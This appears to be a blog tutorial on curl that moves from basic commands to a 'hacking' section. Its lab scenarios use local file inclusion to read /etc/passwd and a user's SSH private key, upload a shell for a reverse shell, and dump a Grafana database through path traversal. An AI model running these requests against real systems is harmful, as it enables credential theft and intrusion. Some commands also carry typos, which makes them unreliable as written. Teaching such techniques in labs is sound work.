We'll start with the basics of curl usage, then move on to some examples of how to use curl to access and manipulate information. By the end of this blog, you'll have a better understanding of curl and how to use it to hack.
What is cURL?
cURL is a powerful command-line tool that allows you to transfer data from or to a server using various protocols such as HTTP, HTTPS, FTP, and more. It's widely used for web development, API integrations, and data retrieval tasks. Curl is typically used to send information to a server and retrieve output from a server.
Here's an introduction to some basic cURL commands to help you get started:By making an HTTP request, curl can transfer data from a remote web server to a local computer. This allows us to manipulate data, such as a web page or file, remotely.
The most recent stable version is 8.1.2, released on 2023-05-30.
Useful cURL commands
Curl HTTP Basic Commands
1. GET Request : curl -X GET ip
2. HEAD Request : curl -I ip
3. OPTIONS Request : curl -X OPTIONS ip -v
4. POST Request : curl -X POST ip
5. PUT Request : curl -XPUT ip
6. DELETE method : curl -X DELETE ip/path -v
You can also specify multiple HTTP methods using --next flag.
curl –data “text=Hello” https://myDomain.com/firstPage.jsp --next https://myDomain.com/webPage.jsp
Curl Commands Combined with Flags
1. Verify curl version
curl --version
2. Basic Syntax
curl [OPTIONS] [URL]
Omitting OPTIONS the will download the source code of a website.
3. Login to a website:
curl -X POST 192.45.178.3/login.php -d "name=mike&password=password" -v
The --data (-d) flag is used you to send data to a specific URL. For example, you can use the --data flag to send a username and password to a login page to gain access to the target system.
4. Upload a file
To upload a file to a server, use the -F flag followed by the form field name and the file location.
curl -F "file=@/path/to/your/file.txt" http://example.com/upload
another option
curl 192.45.178.3/uploads/ --upload-file hello.txt
curl -s "url" | html2text | grep "Hash" -A 1 | grep -v -E "Hash|\--"
6. Multiple downloads
xargs –n 1 curl -O < allUrls.txt
Having a text file with a list of urls to download can be dumped with this command.
7. Spoofing user agent
The --user-agent flag will let you to spoof the user agent of your request. The user agent tells the server which type of browser you are using to access the target system. By spoofing the user agent, you can potentially bypass some security measures.
curl -I http://mydomain.com –-user-agent “My new Browser”
8. Manipulating cookies
The --cookie flag allows you to send cookies to a specific URL. This can be useful if you want to send data that is unique to each user. For example, if you want to send a unique code to each user in order to access the target system, you can use the --cookie flag to send this code.
curl --cookie-jar Mycookies.txt https://www.samplewebsite.com /index.html -O
If you have the cookies in a file, you can send it to the website. An example of such a command is shown below:
curl --cookie Mycookies.txt https://www. samplewebsite.com
9. cURL for FTP
You can use it to download files from a remote server. The username and password can be omitted for anonymous FTP connections.
curl -u username:password -O ftp://anyftpserver/testfile.tar.gz
10. Limit output
While using cURL, you can't tell how big the output will be. You can throttle the bandwidth to make sure it's not throttled by cURL.
The following command restricts the bandwidth to 200K
curl --limit-rate 100K http://testdomain.com/samplefile.tar.gz -O
11. Follow redirects
If the server sends a redirect, use the -L flag to make cURL follow the redirect.
curl -L http://example.com
12. Add custom headers
To send custom headers with your request, use the -H flag.
curl -H "Content-Type: application/json" -H "Authorization: Bearer TOKEN" http://example.com/api/endpoint
Hacking with curl commands:
Now, let’s take a look at how to hack with curl commands. Hacking into someone’s system starts with a few steps. First, you need to identify the target system. Then, you need to find the correct URLs to send the curl commands to. Once you have identified the target system and the correct URLs, you can start sending curl commands.
Scenario 1
Let's say we have done enumeration on our system and discover a suspicious php file. How do we know it is suspicious? because we test it with curl. And how do we test it? Well, we try to run system commands and see how it responds.
We can validate if the url is vulnerable to LFI by using the cURL command for consistency reasons. In this example I attempt to read the content of the /etc/passwd file:
curl 192.168.124.32/secret/suspicious.php?command=/etc/passwd
and successfully list the users of the system
Now, still using curl, we try to dig into the user testing to see if it has interesting information in home directory. For this example we extract the private ssh key stored in .ssh/id_rsa under the home directory of the user testing
curl http://192.168.124.32/secret/suspicious.php?command=/home/testing/.ssh/id_rsa
The rest is history. We save this key and attempt to connect via ssh and pwn the machine.
Variation:
You can try to upload a shell directly to the system if this is LFI vulnerable.
curl 10.129.75.219/?file=/var/lib/tftboot/shell.php'
Note:
LFI
Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploitation of vulnerable inclusion procedures implemented in an application
Scenario 2
In this scenario I discovered a vulnerable url and I am uploading a shell.
Since I am capturing requests in Burpsuite and I want to manipulate such request in my terminal, I can use the option "copy as curl command" and then paste it in my console. Before doing it so, I make sure that response when sending the shell is OK.
Obtaining a 200 response, I can paste the request in my terminal and now I can do a reverse shell in my attacker machine.
And now, well, I own the machine.
Scenario 3
Dumping data from a database. For this instance we have discovered a vulnerable Grafana database.
Since grafana uses sqlite3 database stored in /var/lib/grafana/grafana.db we can use an exploit in go to dump the database.
curl --path-as-is http://192.168.66.181:3000/public/plugins/alertGroups/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
then we can use the DB browser for SQLite in Kali and we browse for data in the data_source table
By using these curl commands, you can hack into systems with relative ease. If you want to know more about cURL you can visit everything curl site.
Disclosure: It’s important to note, however, that hacking into someone’s system is illegal and should only be done with permission. The content of this post is with educational purposes only.
If you’d like to learn more, make sure to check out the official curl documentation. Happy hacking!
No comments:
Post a Comment